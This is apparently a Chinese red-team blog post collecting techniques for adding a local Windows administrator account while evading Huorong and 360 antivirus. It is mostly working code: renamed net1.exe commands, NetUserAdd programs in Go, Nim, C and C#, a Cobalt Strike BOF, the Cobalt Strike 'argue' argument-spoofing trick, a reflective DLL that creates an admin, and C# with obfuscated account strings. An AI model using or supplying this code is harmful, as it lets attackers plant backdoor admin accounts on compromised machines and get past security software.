主要参考火绒和360
正常添加用户指令
net user admin123 admin123!@#123 /addnet localgroup administrators admin123 /add
改名
copy c:\windows\system32\net1.exe C:\ProgramData\net1.txtC:\ProgramData\net1.txt user admin123 admin123!@#123 /add & C:\ProgramData\net1.txt localgroup administrators admin123 /add
Windows API添加用户
package mainimport ("syscall""unsafe")type (DWORD uint32LPWSTR uintptr)const (USER_PRIV_USER = 1UF_SCRIPT = 0x0001NERR_Success = 0)type USER_INFO_1 struct {usri1_name LPWSTRusri_password LPWSTRusri1_password_age DWORDusri1_priv DWORDusri1_home_dir LPWSTRusri1_comment LPWSTRusri1_flags DWORDusri1_script_path LPWSTR}type _LOCALGROUP_USERS_INFO_0 struct {lgrui0_name LPWSTR}var (Netapi32, _ = syscall.LoadLibrary("Netapi32.dll")NetUserAdd, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetUserAdd")NetLocalGroupAddMembers, _ = syscall.GetProcAddress(syscall.Handle(Netapi32), "NetLocalGroupAddMembers")dwError DWORD = 0user USER_INFO_1 = USER_INFO_1{}account _LOCALGROUP_USERS_INFO_0 = _LOCALGROUP_USERS_INFO_0{})func add_user_To_the_admin_group() {user.usri1_name = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("test57")))user.usri_password = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("P@sss!111")))user.usri1_priv = USER_PRIV_USERuser.usri1_flags = UF_SCRIPTif a, _, _ := syscall.Syscall6(NetUserAdd, 4, 0, 1, uintptr(unsafe.Pointer(&user)), uintptr(dwError), 0, 0); a == 0 {println("添加用户成功!")} else {println("添加用户失败")}account.lgrui0_name = user.usri1_namevar admin_group LPWSTRadmin_group = LPWSTR(unsafe.Pointer(syscall.StringToUTF16Ptr("Administrators")))if d, _, _ := syscall.Syscall6(NetLocalGroupAddMembers, 5, 0, uintptr(admin_group), 3, uintptr(unsafe.Pointer(&account)), 1, 0); d == NERR_Success {println("添加用户到管理员组成功!")} else {println("添加用户到管理员组失败")}defer func() {syscall.FreeLibrary(Netapi32)}()}func main() {add_user_To_the_admin_group()}
可以利用不同的语言进行编写
import winim/leanimport winim/inc/lmvar userInfos = USER_INFO_1(usri1_name: "test123",usri1_password: "TestPass123@",usri1_priv: USER_PRIV_USER,usri1_flags: UF_SCRIPT)var account = LOCALGROUP_MEMBERS_INFO_3(lgrmi3_domainandname: userInfos.usri1_name)var dwError = DWORD 0var retVal = NetUserAdd(nil, 1, cast[LPBYTE](&userInfos), &dwError)if retVal != NERR_Success:echo retValelse:echo "[+]User Add Successful !!!"var fiVal = NetLocalGroupAddMembers(nil, "Administrators", 3, cast[LPBYTE](&account), 1)if fiVal != NERR_Success:echo fiValelse:echo "[+]User Add to Administrator Group Successful !!!"
#include "stdafx.h"#ifndef UNICODE#define UNICODE#endif#pragma comment(lib,"netapi32")#include <stdio.h>#include <windows.h>#include <lm.h>int wmain(int argc, wchar_t *argv[]){USER_INFO_1 UserInfo;DWORD dwLevel = 1;DWORD dwError = 0;UserInfo.usri1_name = L"test$"; // 账户UserInfo.usri1_password = L"Test@#123"; // 密码UserInfo.usri1_priv = USER_PRIV_USER;UserInfo.usri1_home_dir = NULL;UserInfo.usri1_comment = NULL;UserInfo.usri1_flags = UF_SCRIPT;UserInfo.usri1_script_path = NULL;NetUserAdd(NULL, dwLevel, (LPBYTE)&UserInfo, &dwError);LOCALGROUP_MEMBERS_INFO_3 account;account.lgrmi3_domainandname = UserInfo.usri1_name;NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);return 0;}
使用NetUserAdd这个API添加普通权限的用户,NetLocalGroupAddMembers这个API添加管理员权限。 需要administrator权限
利用SAM API进行添加用户
https://idiotc4t.com/redteam-research/netuseradd-ni-xiang
本质是对NetUserAdd的逆向,进行更底层的利用
CS BOF执行
#ifndef UNICODE#define UNICODE#endif#include <windows.h>#include <lm.h>#include "beacon.h"typedef DWORD NET_API_STATUS;DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetUserAdd(LPWSTR,DWORD,PBYTE,PDWORD);DECLSPEC_IMPORT NET_API_STATUS WINAPI NETAPI32$NetLocalGroupAddMembers(LPCWSTR,LPCWSTR,DWORD,PBYTE,DWORD);void go(char * args, int alen) {USER_INFO_1 UserInfo;DWORD dwLevel = 1;DWORD dwError = 0;UserInfo.usri1_name = (TCHAR*)L"test123"; // 账户UserInfo.usri1_password = (TCHAR*)L"Test@#123"; // 密码UserInfo.usri1_priv = USER_PRIV_USER;UserInfo.usri1_home_dir = NULL;UserInfo.usri1_comment = NULL;UserInfo.usri1_flags = UF_SCRIPT;UserInfo.usri1_script_path = NULL;NET_API_STATUS nStatus;nStatus = NETAPI32$NetUserAdd(NULL,dwLevel,(LPBYTE)&UserInfo,&dwError);if(nStatus == NERR_Success){BeaconPrintf(CALLBACK_OUTPUT, "User has been successfully added", NULL);}else{BeaconPrintf(CALLBACK_OUTPUT, "User added error %d", nStatus);}LOCALGROUP_MEMBERS_INFO_3 account;account.lgrmi3_domainandname = UserInfo.usri1_name;NET_API_STATUS aStatus;aStatus = NETAPI32$NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);if(aStatus == NERR_Success){BeaconPrintf(CALLBACK_OUTPUT, "User has been successfully added to Administrators", NULL);}else{BeaconPrintf(CALLBACK_OUTPUT, "User added to Administrators error ", NULL);}}
CS Argue参数欺骗
argue 进程参数欺骗argue [command] [fake arguments]argue 命令 假参数 欺骗某个命令参数argue [command]argue 命令 取消欺骗某个命令参数beacon> argue net1 /bypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbypassbeacon> run net1 user admin123 admin123!@#123 /addbeacon> run net1 localgroup administrators admin123 /add
CS 利用反射dll注入
#include "ReflectiveLoader.h"#include "framework.h"#include <stdio.h>extern "C" HINSTANCE hAppInstance;BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){USER_INFO_1 ui;DWORD dwError = 0;ui.usri1_name = (TCHAR*)L"lengyis";ui.usri1_password = (TCHAR*)L"biweilun";ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_DONT_EXPIRE_PASSWD | UF_PASSWD_CANT_CHANGE;;//用户不能更改密码,密码永不过期ui.usri1_script_path = NULL;NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);wchar_t szAccountName[20] = { 0 };switch (ul_reason_for_call){case DLL_QUERY_HMODULE:if (lpReserved != NULL){*(HMODULE*)lpReserved = hAppInstance;}break;case DLL_PROCESS_ATTACH:hAppInstance = hModule;if (!lpReserved != NULL){printf("Parameter passed to Reflective DLL: %s", (char*)lpReserved);}else{printf("No parameter passed to Reflective DLL");}const wchar_t* name;name = (const wchar_t*)L"lengyis";wcscpy_s(szAccountName, name);LOCALGROUP_MEMBERS_INFO_3 account;account.lgrmi3_domainandname = szAccountName;NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);fflush(stdout);ExitProcess(0);break;case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}
Csharp 利用windows目录添加用户
利用DirectoryServices进行添加
using System;using System.DirectoryServices;namespace NoApiUser{// Token: 0x02000002 RID: 2internal class Program{// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250public static string decode(string str){string text = "";for (int i = 0; i < str.Length; i++){text += (str[i] - '\n' + '\u0002').ToString();}return text;}// Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294private static void Main(string[] args){string text = Program.decode("piksmz");string text2 = Program.decode("ijk9:;)");string text3 = Program.decode("Iluqvq{|zi|wz{");try{using (DirectoryEntry directoryEntry = new DirectoryEntry(Program.PATH)){using (DirectoryEntry directoryEntry2 = directoryEntry.Children.Add(text, "User")){directoryEntry2.Properties["FullName"].Add(text);directoryEntry2.Invoke("SetPassword", new object[] { text2 });directoryEntry2.Invoke("Put", new object[] { "Description", "Internet User" });directoryEntry2.Invoke("Put", new object[] { "UserFlags", 66049 });directoryEntry2.CommitChanges();}}Console.WriteLine(string.Concat(new string[] { "[+]Add User: ", text, " password: ", text2, " Successful!" }));}catch (Exception ex){throw new Exception(ex.Message);}try{using (DirectoryEntry directoryEntry3 = new DirectoryEntry(Program.PATH)){using (DirectoryEntry directoryEntry4 = directoryEntry3.Children.Find(text, "User")){using (DirectoryEntry directoryEntry5 = directoryEntry3.Children.Find(text3, "group")){if (directoryEntry5.Name != ""){directoryEntry5.Invoke("Add", new object[] { directoryEntry4.Path.ToString() });directoryEntry5.CommitChanges();}}}Console.WriteLine(string.Concat(new string[] { "[+]Add User: ", text, " to ", text3, " Successful!" }));}}catch (Exception ex2){throw new Exception(ex2.Message);}}// Token: 0x04000001 RID: 1private static readonly string PATH = "WinNT://" + Environment.MachineName;}}
若有收获,就点个赞吧
0 人点赞
